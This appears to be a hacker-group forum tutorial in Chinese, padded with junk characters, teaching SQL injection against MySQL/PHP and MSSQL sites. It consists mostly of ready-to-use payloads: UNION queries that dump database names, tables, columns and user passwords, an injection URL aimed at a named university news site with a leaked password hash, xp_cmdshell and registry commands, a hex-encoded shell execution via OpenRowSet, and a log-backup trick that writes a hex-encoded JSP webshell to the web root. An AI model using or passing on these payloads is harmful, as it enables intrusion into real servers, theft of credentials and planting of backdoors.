————————————————————————九零后安全技术小组 | 90 Security Team -- 打造90后网安精英团队 ———————————————————————————————
/ f5 j1 F+ e- w& p9 l3 m2 N# u/ e# m% V g) V! V6 ?% t! b
3 {& z% J* E% p: q
欢迎高手访问指导,欢迎新手朋友交流学习。1 T! O# `$ @4 L7 ~1 |5 w
" M1 E. Y$ A5 \5 N( \: F
论坛: http://www.90team.net/
+ C# }- } P" j% R/ L. H1 [8 o7 T( _) N0 u1 U
* T+ j% i2 m6 {( ?5 F! S
) I0 {* E4 B1 Q/ o教程内容:Mysql 5+php 注入/ O' v/ s; x6 X" v$ D: q
) \+ |" E, e3 Q$ e/ s, [and (select count(*) from mysql.user)>0/*
$ y& f0 A* K+ i% ?9 K# |- f2 A' J; z! M- r$ H) n
一.查看MYSQL基本信息(库名,版本,用户)+ b! U! O$ G3 ]3 v F. k
$ V+ N3 F* F9 R1 @9 C; dand 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
0 ~& ~; W. G) u) b. }: ?
1 b# {+ k3 O3 e二.查数据库9 X# i t# V3 m: O6 h
6 u* c. Y$ ^0 ^8 N3 [
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*9 g$ y. d. G8 e* |* ^
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
+ h1 ], Z; s# w: M& P9 o
& W. {0 j# k! |5 @7 h三.暴表
I- @; ]" v+ @ Q) _
+ y6 [- N- F, \# Qand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
2 M+ B! f7 }# }4 D" Q5 I
+ o& K1 G+ R2 h9 w% S6 Qlimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。# k3 J* X- O. |
D f7 M% b/ g% v$ i
四.暴字段
% g; `3 A+ `6 Y5 R2 D7 D% B6 c
, d) R6 B- h! d6 I' P! yand 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8 from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
, J/ e' X9 V# U# O3 J* C7 u1 Q
l# |. d8 A$ ^7 @; ^( ?) V5 I' Qlimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
# A5 w- Q% w+ d3 K/ ^. V
" @! { B9 d& {% I8 n五.暴数据
; v Q9 u1 B$ N& h3 z- C* B2 Z% z2 d$ s$ r
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*4 a* N4 u3 t4 ~9 X% F
! {$ z4 r, `% P' f" O
8 A* W# T8 ~5 M1 E- P这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。: p. x3 @7 B( K/ {
- l6 X% `0 t! e% q" G0 K
3 Q1 \# Z2 z" h+ R 新手不明白的可以到论坛发帖提问,我会的尽量给你解答。( K6 s( G0 C9 k: B% p
5 E, O5 t) f8 e4 } 欢迎九零后的新手高手朋友加入我们. Q" u8 q5 j3 ^4 o
7 m* D# s/ y3 _: {3 Y/ L. D
By 【90.S.T】书生 ]5 M% b5 o3 |1 ^- d8 @
# V s% E+ F! c1 S( N+ N- U$ M
MSN/QQ:it7@9.cn
- V! B! A9 C5 ~4 L* d
! U$ {! V- H. U& i/ G3 v5 C( X 论坛:www.90team.net
! T9 H9 {# |. {8 y8 Y
% a8 [ o, }8 B! v+ k) x. G6 \* O) @3 t. S& m. v6 q+ s
( m1 X& e9 J8 ^( e1 x+ o6 B4 P: B- }- p, g
5 G5 f+ Y# o$ l( {( h' V9 R# |
: Q1 n+ C, M' u! u8 y2 n3 u! v% o0 x5 M( |4 `
: a7 q2 }( @1 K/ W& Z( P
& I2 L) g5 p# U
7 n1 k; z- U1 g% i
- Y# F! y1 e+ {; vhttp://news.cupl.edu.cn/V/videoshow.php?id=-95 UNION SELECT 1,2,loginame ,4,5,6,7,8,9 from --
, q# O. A0 w9 u+ M8 ~( t- ]password loginame ! V6 G- w. [& B7 _ w
* e/ r3 W) _; V2 j! i3 u5 J
3 Z3 T2 x6 r4 z/ R/ @& C/ Y
1 [8 G5 b5 w" g/ n. p6 p: o$ X5 f
2 g+ u \' M d5 ohttp://news.cupl.edu.cn/V/videoshow.php?id=-95 UNION SELECT 1,2,TABLE_NAME,4,5,6,7,8,9 rom information_schema.TABLES where TABLE_SCHEMA =CHAR(99, 45, 110, 101, 119, 115) limit 0,1--
2 C7 P* B6 o! P5 D; s' z" o3 s# |# g; v4 C8 G" R
! U9 }2 i" m2 u7 S9 t
# S$ |& |' }8 f# Q+ B# Q: n) J7 J/ W; f6 ]* p8 A5 {/ W. {6 t7 s6 s
* D/ v$ ^5 z6 x; n0 ?, [$ K, A5 j
9 |% z6 M; W( x6 L3 N! n# E% \5 p f& W4 U& |, L
* A; z! F' b/ ?3 y/ V
. `, u- @2 U4 K3 `3 i
/ j H: m! R; P$ s$ ?0 Tadminister( C7 M; }5 N# ^" U
电视台 2 M& r t5 ?' P+ o! S( X }
fafda06a1e73d8db0809ca19f106c300
2 V* x) K( z7 [$ c/ \
* `: E6 ?5 \# C3 K9 T8 _. E0 Q' V6 N4 m! `# D* o. N0 }2 c
! z1 K7 u, P, c) u7 x6 b0 m, T. O: `
+ x" j- v* c: D+ S7 J$ m. P% [* _) c Q. f3 ?( U
6 v0 ~1 ~9 s) G8 y8 _/ y: o9 D0 V5 Q! E b1 q" u
/ f( Q1 N6 n: c+ ^& H+ K" z% d% y8 x
IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm
" l y$ b( o# E7 C5 |2 Y, s& P
) y$ h T* V& r8 N6 n$ I3 y7 U1 q2 M2 w$ ~9 y
读取IIS配置信息获取web路径, S/ h" _2 p2 d0 F0 ^
0 ^; a" m; J9 |( \* V
exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--: q* A |+ R' p' F
" s0 r6 e b+ X. V/ U
执行命令exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
' Z) T0 D8 V2 R5 f t) B4 F; V! q
! \9 q d6 J9 }
9 c! u- o7 o" w, v- N7 CCMD下读取终端端口; g" l- O. J, }
regedit /e c:\\tsport.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp", w7 X0 U7 |' B
: q. a* V% ` U) n0 w. ^# Y
然后 type c:\\tsport.reg | find "PortNumber"
+ }$ j( Z, ^+ ^' y' B: Y$ K3 h& Q! [( E9 m/ q) \
B$ B3 U# n) e4 c# ^/ D) p0 L2 _. ]
E% J0 m5 U+ I( J' K; A
- A$ U# u. L: \9 j; B8 P
$ L9 w% k" n( _* S2 v( I;EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;--
- w R" C( D+ q( T* |5 E* V& v6 h) {( ^1 L- S; |2 Z6 I3 x7 B1 I* j8 X/ x
;declare @s varchar(4000) set @s=cast(0x53656C656374202A2046726F6D204F70656E526F7753657428274D6963726F736F66742E4A65742E4F4C4544422E342E30272C20273B44617461626173653D6961735C6961732E6D6462272C202773656C656374207368656C6C2822636D642E657865202F63206563686F2057656C636F6D6520746F20392E302E732E74202020207777772E39307465616D2E6E65742020627920483478307872207869616F6A756E2020203E20433A5C57696E646F77735C48656C705C69697348656C705C636F6D6D6F6E5C343034622E68746D22292729 as varchar(4000));exec(@s);-- and 1=1 ) q: p$ `# g3 Z9 i
, Y; b8 a# Z% ^. r# ?$ I
2 H9 l+ j/ }- @. S. J# \Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0', ';Database=ias\ias.mdb', 'select shell("cmd.exe /c echo Welcome to 9.0.s.t www.90team.net > C:\Windows\Help\iisHelp\common\404b.htm")')" S% [) B/ I0 R* I9 \
/ n+ C# O$ S& ?: [
$ w r( Z8 R" k; ?+ k* z4 q" ?
6 o$ Z. M1 {" u! _# f0 r: H# P! E
jsp一句话木马
# }! f6 c, k, s5 P+ y8 e
9 L# \* R* u$ a' z
2 f7 l7 O3 n# \2 M9 L: H; K! z: v) j! t* o) F+ v. ?) l
2 j7 M5 x8 y* v1 q■基于日志差异备份6 x! L- i. @; t7 n% p
--1. 进行初始备份0 c. C9 E* w2 N8 o
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
- r7 v/ A' |5 \6 l8 T& r3 n6 B+ d& _8 X' \0 O1 u* K4 x
--2. 插入数据
7 j' E9 Z/ A h" i- F( J" i5 p* b+ G;Insert Into ttt Values(0x3C25DA696628726571756573742E676574506172616D657465722822662229213D6E756C6C29286E6577206A6176612E696F2E46696C654F757470757453747265616D286170706C69636174696F6E2E6765745265616C5061746828225C5C22292B726571756573742E676574506172616D65746572282266222929292E777269746528726571756573742E676574506172616D6574657228227422292E67657442797465732829293BDA253EDA)--' u4 w' l# O; C8 _; a8 A
6 E% ~ n9 _8 `- V3 _9 q# k' ~--3. 备份并获得文件,删除临时表: k3 n) Y9 o& q5 Z% k
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--4 D7 g0 f7 b# C% {
fafda06a1e73d8db0809ca19f106c300
- { t, V/ U5 L- }- qfafda06a1e73d8db0809ca19f106c3007 Y7 t8 S, @- k) ^1 I" S
% c: }! \ l7 u) m3 M
|